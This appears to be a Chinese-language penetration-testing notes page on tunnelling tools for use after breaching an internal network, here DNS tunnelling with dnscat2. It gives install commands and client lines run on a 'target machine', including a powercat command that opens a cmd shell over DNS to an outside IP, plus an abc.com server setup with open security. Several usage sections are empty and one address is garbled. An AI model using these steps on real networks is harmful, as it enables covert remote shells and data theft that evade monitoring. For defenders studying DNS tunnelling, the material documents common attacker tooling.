场景:进入内网后,需要很多代理,穿透,隧道工具,品种繁多,种类齐全,学无止境,特来总结,记录一番,后续是持续更新总结。
一、DNS隧道
DNS(Domain Name System,域名系统),万维网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。在Windows平台下,使用命令行工具,输入nslookup,返回的结果包括域名对应的IP地址(A记录)、别名(CNAME记录)等。除了以上方法外,还可以通过一些DNS查询站点如国外的国内的查询域名的DNS信息。
A 地址此记录列出特定主机名的 IP 地址。这是名称解析的重要记录。
CNAME 标准名称此记录指定标准主机名的别名。
MX邮件交换器此记录列出了负责接收发到域中的电子邮件的主机。
NS名称服务器此记录指定负责给定区域的名称服务器。
1,dnscat2
dnscat2软件是利用DNS协议进行端对端的传输工具,支持通信加密、认证,多个会话,和SSH隧道类似,但传输数据更加隐蔽,支持大多数流行的DNS查询类型(TXT,MX,CNAME,A,AAAA)。而dnscat2客户端采用C语言编写,服务器端采用ruby语言编写。
服务端安装
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle installlinux客户端安装
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ makewindows客户端安装
需要自己用( VS 2008)编译或者去 release 下载 :https://downloads.skullsecurity.org/dnscat2/
-
使用方法1
服务端运行:ruby dnscat.rb
(目标机)客户端运行: ./dnscat --dns server=103.vps.219,port=53
连接建立,服务端存在会话
ping命令执行成功,客户端响应
-
使用方法2 (直连)
服务端:
客户端:
-
使用方法3
服务端:ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache
客户端:
Import-Module .\powercat.ps1
powercat -c 103.45.98.219 -p 53 -dns abc.com -e cmd
运行结果:
参考大佬文章:
https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w
https://blog.csdn.net/localhost01/article/details/86591685
https://mp.weixin.qq.com/s/7kNISpuqFFVTbmal9z6AJA